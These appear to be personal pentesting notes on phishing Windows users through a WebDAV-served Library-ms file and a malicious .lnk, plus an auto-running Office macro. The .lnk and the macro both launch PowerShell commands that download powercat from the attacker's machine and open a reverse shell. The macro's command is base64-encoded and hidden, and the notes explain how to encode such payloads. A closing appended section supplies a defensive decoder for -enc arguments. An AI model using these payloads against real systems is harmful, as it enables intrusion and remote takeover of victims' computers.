WebDAV and dirty Office Macros
Note that this is very scribbly-notes tier writing, and is mostly just so I can remember this stuff. IP addresses may not be consistent.
Server setup
pip3 install wsgidav
mkdir /home/kali/webdav
/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/
Save this as config.Library-ms (this is what lands on the victim as the phishing payload):
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>[url to webdav host]</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
You can now serve a dirty .lnk from the webdav directory on the attack machine. The .lnk target is a single command line, so something like this as the payload:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://[attack machine]:8000/powercat.ps1'); powercat -c [attack machine] -p 4444 -e powershell"
Obviously, you'll need to be serving powercat from a temporary web server on port 8000. python3 -m http.server does this (it listens on 8000 by default).
Office Macro Example
My dirty macro:
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADEAOQAwADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAOQAyAC4AMQA2ADgALgA0ADUALgAxADkAMAAgAC0AcAAgADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
    CreateObject("Wscript.Shell").Run Str
End Sub
The encoded string decodes to:
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.190:8000/powercat.ps1');powercat -c 192.168.45.190 -p 4444 -e powershell
The encoding is UTF-16LE -> base64. PowerShell's -enc (-EncodedCommand) expects the base64 of the UTF-16LE bytes of the script, because Windows represents its strings and command lines in UTF-16LE, so the text has to be converted to that before it is base64-encoded. Most other systems (Linux, the web, etc.) default to UTF-8, which is why a plain base64 of the text does not work.
How to do this from bash:
iconv -f UTF-8 -t UTF-16LE <<< "text" | base64
Two gotchas with that one-liner: the here-string (<<<) appends a trailing newline, which gets encoded along with the text (harmless to PowerShell, but it is why the output differs from CyberChef's), and GNU base64 wraps its output at 76 columns, so for anything longer than a short command pipe through base64 -w0 instead so no line breaks end up in the blob.
Often the payload is too loaded with quotes and parentheses to make this work easily, so you can also use CyberChef.
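When one of these blobs turns up in a macro or a process-creation log, you need the reverse transform. The following is an added example, not part of these notes: a small Python decoder that undoes UTF-16LE -> base64 and pulls -enc arguments out of arbitrary text (macro bodies, Sysmon or 4688 command lines). The flag spellings in the regex and the sample lines are my own assumptions, constructed here.

```python
import base64
import re

# PowerShell -EncodedCommand takes the base64 of the script's UTF-16LE bytes.
# Matches the common spellings (-e, -ec, -en, -enc, -EncodedCommand); PowerShell
# accepts any unambiguous prefix, so extend the alternation if logs show others.
ENC_ARG_RE = re.compile(
    r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)", re.IGNORECASE
)


def encode_enc(script: str) -> str:
    """Same transform as `iconv -f UTF-8 -t UTF-16LE | base64 -w0` (no newline)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_enc(b64: str) -> str:
    """Reverse it: base64 -> UTF-16LE bytes -> text. Raises on malformed input."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE")
    return raw.decode("utf-16-le")


def extract_encoded_commands(text: str) -> list[str]:
    """Find every -enc argument in text and return the decoded scripts."""
    found = []
    for m in ENC_ARG_RE.finditer(text):
        try:
            found.append(decode_enc(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            continue  # base64-looking junk, not a real encoded command
    return found


# Constructed samples (placeholder host, not the one in the notes above).
SAMPLE_SCRIPT = "IEX(New-Object System.Net.WebClient).DownloadString('http://[placeholder]:8000/x.ps1')"
SAMPLE_MACRO_LINE = 'Str = "powershell.exe -nop -w hidden -enc ' + encode_enc(SAMPLE_SCRIPT) + '"'
SAMPLE_BENIGN_LINE = "powershell.exe -ep bypass -File C:\\scripts\\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_MACRO_LINE, SAMPLE_BENIGN_LINE):
        print(line[:60], "->", extract_encoded_commands(line))
```

A trailing "\n" on the decoded text is the fingerprint of the bash here-string method above; its absence (as in the macro in these notes) suggests a different encoder.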